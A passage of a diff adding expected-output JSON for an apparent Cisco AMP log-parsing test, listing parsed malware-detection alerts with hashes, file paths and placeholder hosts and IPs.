"209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + 
"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261639", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27769, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + 
"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261638", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 29385, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + 
"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261637", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 680000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 30665, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + 
"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261636", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 665000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 32281, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + 
"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261635", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 509000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 33561, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], 
+ "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259028591575130", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 984000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259028591575000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 35128, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251439135752194", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 455000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251439135752000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36447, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + 
"cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258981346934873", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 346000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258981346935000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 38014, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + 
{ + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258929807327320", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258929807327000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 39333, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542427", + "cisco.amp.event_type_id": 1090519054, + 
"cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 470000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40652, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542426", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + 
"cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 112000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41978, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542425", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 71000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + 
"event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43297, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537367", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 532000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", 
+ "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44622, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667841684537366", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 454000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 45948, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537365", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 80000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": 